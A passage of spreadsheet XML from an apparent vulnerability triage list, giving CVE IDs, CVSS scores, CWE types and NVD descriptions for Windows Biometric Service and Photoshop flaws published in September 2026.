t="inlineStr" /><c r="M938" s="5" t="inlineStr" /><c r="N938" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O938" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P938" s="5" t="inlineStr" /><c r="Q938" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R938" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S938" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72990</t></is></c></row><row r="939"><c r="A939" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B939" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C939" s="5" t="inlineStr"><is><t>CVE-2026-72991</t></is></c><c r="D939" s="5" t="n"><v>7.8</v></c><c r="E939" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F939" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G939" s="5" t="inlineStr" /><c r="H939" s="5" t="n"><v>0.003</v></c><c r="I939" s="5" t="inlineStr" /><c r="J939" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K93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39" s="5" t="inlineStr" /><c r="M939" s="5" t="inlineStr" /><c r="N939" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O939" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P939" s="5" t="inlineStr" /><c r="Q939" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R939" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S939" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72991</t></is></c></row><row r="940"><c r="A940" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B940" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C940" s="5" t="inlineStr"><is><t>CVE-2026-72992</t></is></c><c r="D940" s="5" t="n"><v>7.8</v></c><c r="E940" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F940" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G940" s="5" t="inlineStr" /><c r="H940" s="5" t="n"><v>0.003</v></c><c r="I940" s="5" t="inlineStr" /><c r="J940" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K94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0" s="5" t="inlineStr" /><c r="M940" s="5" t="inlineStr" /><c r="N940" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O940" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P940" s="5" t="inlineStr" /><c r="Q940" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R940" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S940" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t></is></c></row><row r="941"><c r="A941" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B941" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C941" s="5" t="inlineStr"><is><t>CVE-2026-72993</t></is></c><c r="D941" s="5" t="n"><v>7.8</v></c><c r="E941" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F941" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G941" s="5" t="inlineStr" /><c r="H941" s="5" t="n"><v>0.002</v></c><c r="I941" s="5" t="inlineStr" /><c r="J941" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K94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1" s="5" t="inlineStr" /><c r="M941" s="5" t="inlineStr" /><c r="N941" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O941" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P941" s="5" t="inlineStr" /><c r="Q941" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R941" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S941" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t></is></c></row><row r="942"><c r="A942" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B942" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C942" s="5" t="inlineStr"><is><t>CVE-2026-72994</t></is></c><c r="D942" s="5" t="n"><v>7.8</v></c><c r="E942" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F942" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G942" s="5" t="inlineStr" /><c r="H942" s="5" t="n"><v>0.002</v></c><c r="I942" s="5" t="inlineStr" /><c r="J942" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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2" s="5" t="inlineStr" /><c r="M942" s="5" t="inlineStr" /><c r="N942" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O942" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P942" s="5" t="inlineStr" /><c r="Q942" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="R942" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S942" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t></is></c></row><row r="943"><c r="A943" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B943" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C943" s="5" t="inlineStr"><is><t>CVE-2026-72995</t></is></c><c r="D943" s="5" t="n"><v>7.8</v></c><c r="E943" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F943" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G943" s="5" t="inlineStr" /><c r="H943" s="5" t="n"><v>0.002</v></c><c r="I943" s="5" t="inlineStr" /><c r="J943" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K94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3" s="5" t="inlineStr" /><c r="M943" s="5" t="inlineStr" /><c r="N943" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O943" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P943" s="5" t="inlineStr" /><c r="Q943" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R943" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S943" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72995</t></is></c></row><row r="944"><c r="A944" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B944" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C944" s="5" t="inlineStr"><is><t>CVE-2026-72996</t></is></c><c r="D944" s="5" t="n"><v>7.8</v></c><c r="E944" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F944" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G944" s="5" t="inlineStr" /><c r="H944" s="5" t="n"><v>0.003</v></c><c r="I944" s="5" t="inlineStr" /><c r="J944" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K94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4" s="5" t="inlineStr" /><c r="M944" s="5" t="inlineStr" /><c r="N944" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O944" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P944" s="5" t="inlineStr" /><c r="Q944" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="R944" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S944" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72996</t></is></c></row><row r="945"><c r="A945" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B945" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C945" s="5" t="inlineStr"><is><t>CVE-2026-72997</t></is></c><c r="D945" s="5" t="n"><v>7.8</v></c><c r="E945" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F945" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G945" s="5" t="inlineStr" /><c r="H945" s="5" t="n"><v>0.003</v></c><c r="I945" s="5" t="inlineStr" /><c r="J945" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K94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5" s="5" t="inlineStr" /><c r="M945" s="5" t="inlineStr" /><c r="N945" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O945" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P945" s="5" t="inlineStr" /><c r="Q945" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R945" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S945" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t></is></c></row><row r="946"><c r="A946" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B946" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C946" s="5" t="inlineStr"><is><t>CVE-2026-73000</t></is></c><c r="D946" s="5" t="n"><v>7.8</v></c><c r="E946" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F946" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G946" s="5" t="inlineStr" /><c r="H946" s="5" t="n"><v>0.002</v></c><c r="I946" s="5" t="inlineStr" /><c r="J946" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K94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6" s="5" t="inlineStr" /><c r="M946" s="5" t="inlineStr" /><c r="N946" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O946" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P946" s="5" t="inlineStr" /><c r="Q946" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R946" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S946" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t></is></c></row><row r="947"><c r="A947" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B947" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C947" s="5" t="inlineStr"><is><t>CVE-2026-73001</t></is></c><c r="D947" s="5" t="n"><v>7.8</v></c><c r="E947" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F947" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G947" s="5" t="inlineStr" /><c r="H947" s="5" t="n"><v>0.003</v></c><c r="I947" s="5" t="inlineStr" /><c r="J947" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K94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7" s="5" t="inlineStr" /><c r="M947" s="5" t="inlineStr" /><c r="N947" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O947" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P947" s="5" t="inlineStr" /><c r="Q947" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R947" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S947" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73001</t></is></c></row><row r="948"><c r="A948" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B948" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C948" s="5" t="inlineStr"><is><t>CVE-2026-73002</t></is></c><c r="D948" s="5" t="n"><v>7.8</v></c><c r="E948" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F948" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G948" s="5" t="inlineStr" /><c r="H948" s="5" t="n"><v>0.002</v></c><c r="I948" s="5" t="inlineStr" /><c r="J948" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K94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8" s="5" t="inlineStr" /><c r="M948" s="5" t="inlineStr" /><c r="N948" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O948" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P948" s="5" t="inlineStr" /><c r="Q948" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R948" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S948" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73002</t></is></c></row><row r="949"><c r="A949" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B949" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C949" s="5" t="inlineStr"><is><t>CVE-2026-73007</t></is></c><c r="D949" s="5" t="n"><v>7.8</v></c><c r="E949" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F949" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G949" s="5" t="inlineStr" /><c r="H949" s="5" t="n"><v>0.002</v></c><c r="I949" s="5" t="inlineStr" /><c r="J949" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K94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49" s="5" t="inlineStr" /><c r="M949" s="5" t="inlineStr" /><c r="N949" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O949" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P949" s="5" t="inlineStr" /><c r="Q949" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R949" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S949" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73007</t></is></c></row><row r="950"><c r="A950" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B950" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C950" s="5" t="inlineStr"><is><t>CVE-2026-73011</t></is></c><c r="D950" s="5" t="n"><v>7.8</v></c><c r="E950" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F950" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G950" s="5" t="inlineStr" /><c r="H950" s="5" t="n"><v>0.002</v></c><c r="I950" s="5" t="inlineStr" /><c r="J950" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K95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50" s="5" t="inlineStr" /><c r="M950" s="5" t="inlineStr" /><c r="N950" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O950" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P950" s="5" t="inlineStr" /><c r="Q950" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R950" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S950" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73011</t></is></c></row><row r="951"><c r="A951" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B951" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C951" s="5" t="inlineStr"><is><t>CVE-2026-73014</t></is></c><c r="D951" s="5" t="n"><v>7.8</v></c><c r="E951" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F951" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G951" s="5" t="inlineStr" /><c r="H951" s="5" t="n"><v>0.003</v></c><c r="I951" s="5" t="inlineStr" /><c r="J951" s="5" t="inlineStr" /><c r="K951" s="5" t="inlineStr" /><c r="L951" s="5" t="inlineStr" /><c r="M951" s="5" t="inlineStr" /><c r="N951" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O951" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P951" s="5" t="inlineStr" /><c r="Q951" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R951" s="5" t="inlineStr"><is><t>Missing authorization in Data Sharing Service Client allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S951" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73014</t></is></c></row><row r="952"><c r="A952" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B952" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C952" s="5" t="inlineStr"><is><t>CVE-2026-73015</t></is></c><c r="D952" s="5" t="n"><v>7.8</v></c><c r="E952" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F952" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G952" s="5" t="inlineStr" /><c r="H952" s="5" t="n"><v>0.002</v></c><c r="I952" s="5" t="inlineStr" /><c r="J952" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K95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52" s="5" t="inlineStr" /><c r="M952" s="5" t="inlineStr" /><c r="N952" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O952" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P952" s="5" t="inlineStr" /><c r="Q952" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R952" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S952" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t></is></c></row><row r="953"><c r="A953" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B953" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C953" s="5" t="inlineStr"><is><t>CVE-2026-73020</t></is></c><c r="D953" s="5" t="n"><v>7.8</v></c><c r="E953" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F953" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G953" s="5" t="inlineStr" /><c r="H953" s="5" t="n"><v>0.002</v></c><c r="I953" s="5" t="inlineStr" /><c r="J953" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K95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53" s="5" t="inlineStr" /><c r="M953" s="5" t="inlineStr" /><c r="N953" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O953" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P953" s="5" t="inlineStr" /><c r="Q953" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R953" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S953" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t></is></c></row><row r="954"><c r="A954" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B954" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C954" s="5" t="inlineStr"><is><t>CVE-2026-73021</t></is></c><c r="D954" s="5" t="n"><v>7.8</v></c><c r="E954" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F954" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G954" s="5" t="inlineStr" /><c r="H954" s="5" t="n"><v>0.003</v></c><c r="I954" s="5" t="inlineStr" /><c r="J954" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K95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54" s="5" t="inlineStr" /><c r="M954" s="5" t="inlineStr" /><c r="N954" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O954" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P954" s="5" t="inlineStr" /><c r="Q954" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="R954" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S954" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73021</t></is></c></row><row r="955"><c r="A955" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B955" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C955" s="5" t="inlineStr"><is><t>CVE-2026-73024</t></is></c><c r="D955" s="5" t="n"><v>7.8</v></c><c r="E955" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F955" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G955" s="5" t="inlineStr" /><c r="H955" s="5" t="n"><v>0.002</v></c><c r="I955" s="5" t="inlineStr" /><c r="J955" s="5" t="inlineStr" /><c r="K955" s="5" t="inlineStr" /><c r="L955" s="5" t="inlineStr" /><c r="M955" s="5" t="inlineStr" /><c r="N955" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O955" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P955" s="5" t="inlineStr" /><c r="Q955" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R955" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S955" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73024</t></is></c></row><row r="956"><c r="A956" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B956" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C956" s="5" t="inlineStr"><is><t>CVE-2026-73026</t></is></c><c r="D956" s="5" t="n"><v>7.8</v></c><c r="E956" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F956" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G956" s="5" t="inlineStr" /><c r="H956" s="5" t="n"><v>0.002</v></c><c r="I956" s="5" t="inlineStr" /><c r="J956" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K95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56" s="5" t="inlineStr" /><c r="M956" s="5" t="inlineStr" /><c r="N956" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O956" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P956" s="5" t="inlineStr" /><c r="Q956" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R956" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S956" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73026</t></is></c></row><row r="957"><c r="A957" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B957" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C957" s="5" t="inlineStr"><is><t>CVE-2026-7476</t></is></c><c r="D957" s="5" t="n"><v>7.8</v></c><c r="E957" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F957" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G957" s="5" t="inlineStr" /><c r="H957" s="5" t="n"><v>0.001</v></c><c r="I957" s="5" t="inlineStr" /><c r="J957" s="5" t="inlineStr" /><c r="K957" s="5" t="inlineStr" /><c r="L957" s="5" t="inlineStr" /><c r="M957" s="5" t="inlineStr" /><c r="N957" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O957" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P957" s="5" t="inlineStr" /><c r="Q957" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R957" s="5" t="inlineStr"><is><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is></c><c r="S957" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7476</t></is></c></row><row r="958"><c r="A958" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B958" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C958" s="5" t="inlineStr"><is><t>CVE-2026-7477</t></is></c><c r="D958" s="5" t="n"><v>7.8</v></c><c r="E958" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F958" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G958" s="5" t="inlineStr" /><c r="H958" s="5" t="n"><v>0.001</v></c><c r="I958" s="5" t="inlineStr" /><c r="J958" s="5" t="inlineStr" /><c r="K958" s="5" t="inlineStr" /><c r="L958" s="5" t="inlineStr" /><c r="M958" s="5" t="inlineStr" /><c r="N958" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O958" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P958" s="5" t="inlineStr" /><c r="Q958" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R958"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is></c><c r="S958" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7477</t></is></c></row><row r="959"><c r="A959" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B959" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C959" s="5" t="inlineStr"><is><t>CVE-2026-75631</t></is></c><c r="D959" s="5" t="n"><v>7.8</v></c><c r="E959" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F959" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G959" s="5" t="inlineStr" /><c r="H959" s="5" t="n"><v>0.002</v></c><c r="I959" s="5" t="inlineStr" /><c r="J959" s="5" t="inlineStr" /><c r="K959" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L959" s="5" t="inlineStr" /><c r="M959" s="5" t="inlineStr" /><c r="N959" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O959" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P959" s="5" t="inlineStr" /><c r="Q959" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R959" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="S959" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75631</t></is></c></row><row r="960"><c r="A960" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B960" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C960" s="5" t="inlineStr"><is><t>CVE-2026-75771</t></is></c><c r="D960" s="5" t="n"><v>7.8</v></c><c r="E960" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F960" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G960" s="5" t="inlineStr" /><c r="H960" s="5" t="n"><v>0.002</v></c><c r="I960" s="5" t="inlineStr" /><c r="J960" s="5" t="inlineStr" /><c r="K960" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L960" s="5" t="inlineStr" /><c r="M960" s="5" t="inlineStr" /><c r="N960" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O960" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P960" s="5" t="inlineStr" /><c r="Q960" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R960"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S960" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75771</t></is></c></row><row r="961"><c r="A961" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B961" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C961" s="5" t="inlineStr"><is><t>CVE-2026-75862</t></is></c><c r="D961" s="5" t="n"><v>7.8</v></c><c r="E961" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F961" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G961" s="5" t="inlineStr" /><c r="H961" s="5" t="n"><v>0.002</v></c><c r="I961" s="5" t="inlineStr" /><c r="J961" s="5" t="inlineStr" /><c r="K961" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L961" s="5" t="inlineStr" /><c r="M961" s="5" t="inlineStr" /><c r="N961" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O961" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P961" s="5" t="inlineStr" /><c r="Q961" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R961"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S961" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75862</t></is></c></row><row r="962"><c r="A962" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B962" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C962" s="5" t="inlineStr"><is><t>CVE-2026-75863</t></is></c><c r="D962" s="5" t="n"><v>7.8</v></c><c r="E962" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F962" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G962" s="5" t="inlineStr" /><c r="H962" s="5" t="n"><v>0.002</v></c><c r="I962" s="5" t="inlineStr" /><c r="J962" s="5" t="inlineStr" /><c r="K962" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L962" s="5" t="inlineStr" /><c r="M962" s="5" t="inlineStr" /><c r="N962" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O962" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P962" s="5" t="inlineStr" /><c r="Q962" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R96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S962" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75863</t></is></c></row><row r="963"><c r="A963" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B963" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C963" s="5" 